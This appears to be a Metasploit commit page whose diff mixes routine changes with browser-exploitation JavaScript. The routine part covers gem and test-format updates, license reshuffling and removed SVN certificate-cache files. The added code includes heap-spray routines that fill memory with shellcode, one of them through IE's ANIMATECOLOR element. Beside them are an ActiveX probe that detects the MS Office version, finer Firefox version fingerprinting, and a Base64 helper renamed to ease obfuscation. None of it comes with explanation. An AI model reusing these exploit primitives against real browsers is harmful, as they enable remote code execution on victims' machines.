Land #2592 and #2612

* Adds getproxy support (required by new functionality in #2612) * Rebuilt binaries with VS2013 (slightly smaller).
Land #2612 , Update meterpreter bins
2013-11-08 13:44:00 -06:00 · 2013-11-08 13:23:14 -06:00 · 2013-11-08 13:20:20 -06:00 · 2013-11-08 08:41:04 -06:00 · 2013-11-08 08:30:35 -06:00 · 2013-11-07 18:50:11 -08:00
2460 changed files with 12243 additions and 11035 deletions
@@ -1,2 +1,2 @@
 --color
--format documentation
+--format Fivemat
@@ -40,6 +40,8 @@ group :development, :test do
 	# Version 4.1.0 or newer is needed to support generate calls without the
 	# 'FactoryGirl.' in factory definitions syntax.
 	gem 'factory_girl', '>= 4.1.0'
+# Make rspec output shorter and more useful
+	gem 'fivemat', '1.2.1'
 	# running documentation generation tasks and rspec tasks
 	gem 'rake', '>= 10.0.0'
 end
@@ -18,6 +18,7 @@ GEM
    diff-lcs (1.2.4)
    factory_girl (4.2.0)
      activesupport (>= 3.0.0)
+    fivemat (1.2.1)
    i18n (0.6.5)
    json (1.8.0)
    metasploit_data_models (0.16.6)
@@ -62,6 +63,7 @@ DEPENDENCIES
  activesupport (>= 3.0.0)
  database_cleaner
  factory_girl (>= 4.1.0)
+  fivemat (= 1.2.1)
  json
  metasploit_data_models (~> 0.16.6)
  msgpack
@@ -12,7 +12,7 @@ License: BSD-3-clause
 #
 # This license does not apply to third-party components detailed below.
 #
-# Last updated: 2013-Mar-25
+# Last updated: 2013-Nov-04
 #

 Files: data/john/*
@@ -166,230 +166,6 @@ Files: lib/fastlib.rb
 Copyright: 2011, Rapid7 Inc.
 License: Ruby

-Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
-Copyright: 2006-2007, Francis Cianfrocca
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
-Copyright: Daniel Luz <dev at mernen dot com>
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
-Copyright: Marc-Andre Cournoyer
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
-Copyright: 2007-2012, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
-Copyright: 2006-2010, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
-License: LGPL-2.1
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
-Copyright: 2006-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
-Copyright: 2007 David Heinemeir Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
-Copyright: 2011 Ben Johnson of Binary Logic
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
-Copyright: 2008-2012 Jonas Nicklas
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
-Copyright: 2010 Willem van Bergen
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: Rob Aldred
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
-Copyright: 2005-2012 Thomas Uehlinger
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
-Copyright: 2006-2011 kuwata-lab.com all rights reserved
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
-Copyright: 2008-2010
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
-Copyright: 2011 Travis Tilley
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
-Copyright: 2011 Sam Stephenson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
-Copyright: 2010-2012 John Crepezzi
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
-Copyright: 2011 Aaron Patternson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
-Copyright: 2010 Andre Arko
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
-Copyright: 2005, 2006 Tobias Luetke
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
-Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
-Copyright: 2011 John Mair (banisterfiend)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
-Copyright: 2007 Clifford Heath
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
-Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
-Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
-Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
-Copyright: 2010 Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
-Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
-Copyright: No copyright statement provided
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
-Copyright: 2012 Lee Jarvis
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
-Copyright: 2009 Tim Harper
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
-Copyright: 2011 Sam Stephenson, Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
-Copyright: 2006-2012 Aaron Pfeifer
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
-Copyright: 2008 Yehuda Katz
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
-Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
-Copyright: 2007 Nathan Sobo
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
@@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

+#
+# Gems
+#
+
+Files: activemodel
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activerecord
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activesupport
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: arel
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: builder
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: database_cleaner
+Copyright: 2009 Ben Mabey
+License: MIT
+
+Files: diff-lcs
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: factory_girl
+Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
+License: MIT
+
+Files: fivemat
+Copyright: 2012 Tim Pope
+License: MIT
+
+Files: i18n
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: json
+Copyright: Daniel Luz <dev at mernen dot com>
+License: Ruby
+
+Files: metasploit_data_models
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: mini_portile
+Copyright: 2011 Luis Lavena
+License: MIT
+
+Files: msgpack
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: multi_json
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: network_interface
+Copyright: 2012, Rapid7, Inc.
+License: MIT
+
+Files: nokogiri
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: packetfu
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: pcaprub
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: pg
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: rake
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: redcarpet
+Copyright: 2009 Natacha Porté
+License: MIT
+
+Files: robots
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: rspec
+Copyright: 2009 Chad Humphries, David Chelimsky
+License: MIT
+
+Files: shoulda-matchers
+Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
+License: MIT
+
+Files: simplecov
+Copyright: 2010-2012 Christoph Olszowka
+License: MIT
+
+Files: timecop
+Copyright: 2012 Travis Jeffery, John Trupiano
+License: MIT
+
+Files: tzinfo
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: yard
+Copyright: 2007-2013 Loren Segal
+License: MIT
+
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -0,0 +1,51 @@
+window.addons_detect = { };
+
+/**
+ * Returns the version of Microsoft Office. If not found, returns null.
+ **/
+window.addons_detect.getMsOfficeVersion = function () {
+  var version;
+  var types = new Array();
+  for (var i=1; i <= 5; i++) {
+    try {
+      types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
+    }
+    catch (e) {
+      types[i-1] = null;
+    }
+  }
+
+  if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+      types[3] == 'object' && types[4] == 'object')
+  {
+    version = "2012";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == 'object' && types[4] == null)
+  {
+    version = "2010";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2007";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2003";
+  }
+  else if (types[0] == 'object' && types[1] == null && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    // If run for the first time, you must manullay allow the "Microsoft Office XP"
+    // add-on to run. However, this prompt won't show because the ActiveXObject statement
+    // is wrapped in an exception handler.
+    version = "xp";
+  }
+  else {
+    version = null;
+  }
+
+  return version;
+}
@@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
 		return d.style[propCamelCase] === css;
 	}

+	var input_type_is_valid = function(input_type) {
+		if (!document.createElement) return false;
+		var input = document.createElement('input');
+		input.setAttribute('type', input_type);
+		return input.type == input_type;
+	}
+
 	//--
 	// Client
 	//--
@@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
 		// Thanks to developer.mozilla.org "Firefox for developers" series for most
 		// of these.
 		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
-		if ('HTMLTimeElement' in window) {
-			ua_version = '22.0'
+		if (css_is_valid('background-attachment',
+		                 'backgroundAttachment',
+		                 'local')) {
+			ua_version = '25.0';
+		} else if ('DeviceStorage' in window && window.DeviceStorage &&
+				'default' in window.DeviceStorage.prototype) {
+			// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
+			ua_version = '24.0';
+		} else if (input_type_is_valid('range')) {
+			ua_version = '23.0';
+		} else if ('HTMLTimeElement' in window) {
+			ua_version = '22.0';
 		} else if ('createElement' in document &&
 		           document.createElement('main') &&
 		           document.createElement('main').constructor === window['HTMLElement']) {
-			ua_version = '21.0'
+			ua_version = '21.0';
 		} else if ('imul' in Math) {
-			ua_version = '20.0'
+			ua_version = '20.0';
 		} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
-			ua_version = '19.0'
+			ua_version = '19.0';
 		} else if ('devicePixelRatio' in window) {
-			ua_version = '18.0'
+			ua_version = '18.0';
 		} else if ('createElement' in document &&
 		           document.createElement('iframe') &&
 		           'sandbox' in document.createElement('iframe')) {
-			ua_version = '17.0'
+			ua_version = '17.0';
 		} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
-			ua_version = '16.0'
+			ua_version = '16.0';
 		} else if ('HTMLSourceElement' in window && 
 		           HTMLSourceElement.prototype &&
 		           'media' in HTMLSourceElement.prototype) {
-			ua_version = '15.0'
+			ua_version = '15.0';
 		} else if ('mozRequestPointerLock' in document.body) {
-			ua_version = '14.0'
+			ua_version = '14.0';
 		} else if ('Map' in window) {
-			ua_version = "13.0"
+			ua_version = "13.0";
 		} else if ('mozConnection' in navigator) {
 			ua_version = "12.0";
 		} else if ('mozVibrate' in navigator) {
@@ -0,0 +1,17 @@
+var memory = new Array();
+function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
+  var index;
+  var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
+  var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
+  while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
+  while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
+
+  var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
+  while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
+  retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
+
+  var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
+  for (index = 0; index < heapBlockCnt; index++) {
+    memory[index] = retSlide + shellcode;
+  }
+}
@@ -0,0 +1,31 @@
+function mstime_malloc(oArg) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
+  if (offset        == undefined) { offset = 0; }
+  if (heapBlockSize == undefined) { throw "Size must be defined"; }
+
+  var buf = "";
+  for (var i=0; i < heapBlockSize/4; i++) {
+    if (i == offset) {
+      if (i == 0) { buf += shellcode;       }
+      else        { buf += ";" + shellcode; }
+    }
+    else {
+      buf += ";#W00TA";
+    }
+  }
+
+  var e = document.getElementById(objId);
+  if (e == null) {
+    var eleId = "W00TB"
+    var acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
+    document.body.innerHTML = document.body.innerHTML + acTag;
+    e = document.getElementById(eleId);
+  }
+  try { e.values = buf; }
+  catch (e) {}
+}
@@ -0,0 +1,38 @@
+var sym_div_container;
+function sprayHeap( oArg ) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var maxAllocs     = oArg.maxAllocs;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
+  if (offset        == undefined)  { offset        = 0x00; }
+  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
+  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
+
+  if (offset > 0x800) { throw "Bad alignment"; }
+
+  sym_div_container = document.getElementById(objId);
+
+  if (sym_div_container == null) {
+    sym_div_container = document.createElement("div");
+  }
+
+  sym_div_container.style.cssText = "display:none";
+  var data;
+  junk = unescape("%u2020%u2020");
+  while (junk.length < offset+0x1000) junk += junk;
+
+  data = junk.substring(0,offset) + shellcode;
+  data += junk.substring(0,0x800-offset-shellcode.length);
+
+  while (data.length < heapBlockSize) data += data;
+
+  for (var i = 0; i < maxAllocs; i++)
+  {
+    var obj = document.createElement("button");
+    obj.title = data.substring(0, (heapBlockSize-2)/2);
+    sym_div_container.appendChild(obj);
+  }
+}
@@ -0,0 +1,27 @@
+function ajax_download(oArg) {
+  var method = oArg.method;
+  var path   = oArg.path;
+  var data   = oArg.data;
+
+  if (method == undefined) { method = "GET"; }
+  if (method == path)      { throw "Missing parameter 'path'"; }
+  if (data   == undefined) { data = null; }
+
+  if (window.XMLHttpRequest) {
+    xmlHttp = new XMLHttpRequest();
+  }
+  else {
+    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+  }
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open(method, path, false);
+  xmlHttp.send(data);
+  if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+    return xmlHttp.responseText;
+  }
+  return null;
+}
@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+  // private property
+  _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+  // private method
+  _utf8_encode : function ( input ){
+    input = input.replace(/\r\n/g,"\\n");
+    var utftext = "";
+    var input_idx;
+
+    for (input_idx = 0; input_idx < input.length; input_idx++) {
+      var chr = input.charCodeAt(input_idx);
+      if (chr < 128) {
+        utftext += String.fromCharCode(chr);
+      }
+      else if((chr > 127) && (chr < 2048)) {
+        utftext += String.fromCharCode((chr >> 6) | 192);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      } else {
+        utftext += String.fromCharCode((chr >> 12) | 224);
+        utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      }
+    }
+
+    return utftext;
+  },
+
+  // public method for encoding
+  encode : function( input ) {
+    var output = "";
+    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+    var input_idx = 0;
+
+    input = Base64._utf8_encode(input);
+
+    while (input_idx < input.length) {
+      chr1 = input.charCodeAt( input_idx++ );
+      chr2 = input.charCodeAt( input_idx++ );
+      chr3 = input.charCodeAt( input_idx++ );
+
+      enc1 = chr1 >> 2;
+      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+      enc4 = chr3 & 63;
+
+      if (isNaN(chr2)) {
+        enc3 = enc4 = 64;
+      } else if (isNaN(chr3)) {
+        enc4 = 64;
+      }
+      output = output +
+      this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+      this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+    }
+    return output;
+  },
+  // public method for decoding
+  decode : function (input) {
+    var output = "";
+    var chr1, chr2, chr3;
+    var enc1, enc2, enc3, enc4;
+    var i = 0;
+
+    input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+
+    while (i < input.length) {
+
+      enc1 = this._keyStr.indexOf(input.charAt(i++));
+      enc2 = this._keyStr.indexOf(input.charAt(i++));
+      enc3 = this._keyStr.indexOf(input.charAt(i++));
+      enc4 = this._keyStr.indexOf(input.charAt(i++));
+
+      chr1 = (enc1 << 2) | (enc2 >> 4);
+      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+      chr3 = ((enc3 & 3) << 6) | enc4;
+
+      output = output + String.fromCharCode(chr1);
+
+      if (enc3 != 64) {
+        output = output + String.fromCharCode(chr2);
+      }
+      if (enc4 != 64) {
+        output = output + String.fromCharCode(chr3);
+      }
+
+    }
+
+    output = Base64._utf8_decode(output);
+
+    return output;
+
+  },
+  _utf8_decode : function (utftext) {
+    var string = "";
+    var input_idx = 0;
+    var chr1 = 0;
+    var chr2 = 0;
+    var chr3 = 0;
+
+    while ( input_idx < utftext.length ) {
+
+      chr1 = utftext.charCodeAt(input_idx);
+
+      if (chr1 < 128) {
+        string += String.fromCharCode(chr1);
+        input_idx++;
+      }
+      else if((chr1 > 191) && (chr1 < 224)) {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
+        input_idx += 2;
+      } else {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        chr3 = utftext.charCodeAt(input_idx+2);
+        string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+        input_idx += 3;
+      }
+    }
+
+    return string;
+  }
+
+};
@@ -1,13 +0,0 @@
-K 10
-ascii_cert
-V 1844
-MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
-K 8
-failures
-V 1
-8
-K 15
-svn:realmstring
-V 26
-https://metasploit.com:443
-END
@@ -1,13 +0,0 @@
-K 10
-ascii_cert
-V 1844
-MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQA